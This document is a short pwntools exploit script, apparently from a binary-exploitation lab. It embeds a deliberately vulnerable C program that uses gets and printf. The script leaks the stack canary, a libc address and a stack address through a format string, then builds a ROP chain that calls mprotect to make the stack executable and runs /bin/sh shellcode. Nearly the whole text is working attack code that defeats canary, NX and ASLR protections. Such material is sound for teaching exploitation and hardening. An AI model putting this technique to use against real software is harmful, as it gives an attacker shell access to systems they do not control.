Ret2mprotect - Bypassing canary stack, NX and ASLR.

exploit.py

from pwn import *


'''
// File: bypass-protections.c
// gcc bypass-protections.c -o bypass-protections

#include <stdio.h>
#include <stdlib.h>

void doRead()
{
        char buffer[28];
		char test[12];
        gets(buffer);
		printf(buffer);
		printf("\n");
		gets(test);
}

void success(){
	printf("Dummy!!\n");
}

int main(int argc)
{
        doRead();
}
'''

context(arch = 'amd64', os = 'linux')

elf = ELF("./bypass-protections")
p = process(elf.path)
#p = gdb.debug("./bypass-protections", '''
#break main
#''')

p.sendline("%13$p,%19$p,%44$p")
canary_p = p.recvuntil("\x0a")
log.success("Canary: " + canary_p.split(",")[0])
log.success("__libc_start_main+240: "+ canary_p.split(",")[1])
log.success("stack addr: " + hex(int(canary_p.split(",")[2].replace("\n",""), 16)-0x1e888)[:11]+"000")
canary = p64(int(canary_p.split(",")[0], 16))
libc_addr = int(canary_p.split(",")[1], 16)-240-0x20740             # 5d8e5f37ada3fc853363a4f3f631a41a  /lib/x86_64-linux-gnu/libc.so.6
mprotect_addr = libc_addr + 0x101770                                # int mprotect(void *addr, size_t len, int prot);   <- rdi = stack_addr     rsi = 0x21000   rdx = 0x7 
stack_addr = int(hex(int(canary_p.split(",")[2], 16)-0x1e888)[:11]+"000", 16)+0x1000
log.success("libc addr: " + hex(libc_addr))         
log.success("mprotect addr: " + hex(mprotect_addr))
##### ROP Gadgets #####
# 0x0000000000400763: pop rdi; ret;
# 0x0000000000400761: pop rsi; pop r15; ret
# 0x0000000000001b92: pop rdx; ret                  <- libc
# 0x0000000000002a71: jmp rsp                       <- libc
p.sendline("A"*56 + canary + "AAAAAAAA"+p64(libc_addr+0x1b92)+p64(0x7)+p64(0x400761)+p64(0x21000)+"AAAAAAAA"+p64(0x400763)+p64(stack_addr)+p64(mprotect_addr)+p64(libc_addr+0x2a71)+asm(shellcraft.amd64.linux.sh()))
p.interactive()